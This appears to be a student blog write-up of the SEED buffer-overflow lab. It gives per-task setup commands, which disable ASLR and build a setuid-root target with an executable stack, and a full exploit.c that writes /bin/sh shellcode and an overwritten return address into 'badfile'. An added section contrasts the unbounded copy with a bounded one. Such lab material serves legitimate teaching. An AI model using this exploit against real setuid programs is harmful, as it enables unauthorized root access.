  • Buffer-Overflow Vulnerability Lab

    Lab overview

    • Definition of buffer overflow: a buffer overflow is the condition in which a program attempts to write data beyond the boundaries of a pre-allocated, fixed-length buffer.

    • Why buffer overflows are dangerous: a malicious user can use this vulnerability to alter the control flow of the program and even execute arbitrary code. The vulnerability arises because storage for data (e.g. buffers) is mixed with storage for control information (e.g. return addresses): an overflow in the data part can affect the control flow of the program, because the overflow can overwrite the return address.

    Lab objectives

    The task is to develop a scheme to exploit the vulnerability and finally gain root privilege. In addition to the attacks, students will be guided through several protection schemes implemented in the operating system to counter buffer-overflow attacks. Students need to evaluate whether each scheme works and explain why.

    Lab tasks

    Task1

    sudo sysctl -w kernel.randomize_va_space=0
    
    sudo rm /bin/sh
    sudo ln -s /bin/zsh /bin/sh
    
    gcc -z execstack -o call_shellcode call_shellcode.c
    

    Task2

    sudo sysctl -w kernel.randomize_va_space=0
    
    sudo rm /bin/sh
    sudo ln -s /bin/zsh /bin/sh
    
    gcc -o stack -z execstack -fno-stack-protector stack.c 
    sudo chown root stack 
    sudo chmod 4755 stack # chmod 4755 filename sets the setuid bit, so the program runs with root privileges
    
    gcc -o exploit exploit.c 
    

    exploit.c

    /* exploit.c  */

    /* A program that creates a file containing code for launching a shell */
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>

    char shellcode[] =
        "\x31\xc0"             /* xorl    %eax,%eax              */
        "\x50"                 /* pushl   %eax                   */
        "\x68""//sh"           /* pushl   $0x68732f2f            */
        "\x68""/bin"           /* pushl   $0x6e69622f            */
        "\x89\xe3"             /* movl    %esp,%ebx              */
        "\x50"                 /* pushl   %eax                   */
        "\x53"                 /* pushl   %ebx                   */
        "\x89\xe1"             /* movl    %esp,%ecx              */
        "\x99"                 /* cdq                            */
        "\xb0\x0b"             /* movb    $0x0b,%al              */
        "\xcd\x80"             /* int     $0x80                  */
    ;

    int main(int argc, char **argv)
    {
        char buffer[517];
        FILE *badfile;

        /* Initialize buffer with 0x90 (NOP instruction) */
        memset(buffer, 0x90, 517);

        /* You need to fill the buffer with appropriate contents here */
        strcpy(buffer + 100, shellcode);             /* copy the shellcode into the buffer */
        strcpy(buffer + 0x24, "\x5c\xeb\xff\xbf");   /* the four bytes starting at this offset overwrite the saved return address with the shellcode's address */

        /* Save the contents to the file "badfile" */
        badfile = fopen("./badfile", "w");
        if (badfile == NULL) {
            perror("fopen");
            return 1;
        }
        fwrite(buffer, 517, 1, badfile);
        fclose(badfile);
        return 0;
    }
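
    As an added example (not part of the lab's stack.c or of the original post), here is the unbounded-copy pattern that badfile is aimed at, next to a bounded version that refuses input which would not fit; BUF_SIZE, the function names and the NOP-filled test input are assumptions, not the lab's own values.

```c
/* Constructed example: vulnerable copy vs. bounded copy. Not the lab's code. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 24   /* assumed small stack buffer, as a lab-style target would have */

/* Vulnerable: strcpy copies until the NUL byte, so a 517-byte badfile
 * overruns buffer[] and the saved return address above it. Shown only for
 * contrast; calling it with oversized input is undefined behaviour. */
int bof_vulnerable(const char *str)
{
    char buffer[BUF_SIZE];
    strcpy(buffer, str);              /* no bound on str */
    return (int)strlen(buffer);
}

/* Hardened: the caller passes the input length, and anything that would not
 * fit (including the terminating NUL) is rejected instead of written past
 * the buffer. Returns 0 on success, -1 if the input was too long. */
int bof_hardened(const char *str, size_t len)
{
    char buffer[BUF_SIZE];
    if (len >= BUF_SIZE) {
        return -1;                    /* would overflow: refuse */
    }
    memcpy(buffer, str, len);
    buffer[len] = '\0';
    return 0;
}

/* Builds a constructed input of `len` NOP bytes (0x90, like the start of
 * the lab's badfile) and feeds it to the hardened copy; returns its result,
 * or -2 if the allocation failed. */
int feed_nop_input(size_t len)
{
    char *in = malloc(len > 0 ? len : 1);
    if (in == NULL) return -2;
    memset(in, 0x90, len);
    int r = bof_hardened(in, len);
    free(in);
    return r;
}

int main(void)
{
    /* A full 517-byte badfile-sized input is refused; a 23-byte one fits. */
    printf("517 bytes: %d, 23 bytes: %d\n", feed_nop_input(517), feed_nop_input(23));
    return 0;
}
```

    The compiler flags in Tasks 5 and 6 (stack protector, non-executable stack) are extra layers on top of this; the bounds check is what removes the bug itself.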
    

    Task3

    sudo rm /bin/sh
    sudo ln -s /bin/dash /bin/sh
    
    gcc dash_shell_test.c -o dash_shell_test
    sudo chown root dash_shell_test
    sudo chmod 4755 dash_shell_test
    
    gcc -o exploit_task3 exploit_task3.c 
    

    Task4

    sudo /sbin/sysctl -w kernel.randomize_va_space=2
    
    sh task4.sh
    

    Task5

    sudo sysctl -w kernel.randomize_va_space=0
    
    gcc -o stack -z execstack stack.c 
    sudo chown root stack 
    sudo chmod 4755 stack 
    

    Task6

    sudo sysctl -w kernel.randomize_va_space=0
    
    gcc -o stack -fno-stack-protector -z noexecstack stack.c
    sudo chown root stack 
    sudo chmod 4755 stack
    
  • Original article: https://www.cnblogs.com/solvit/p/11970383.html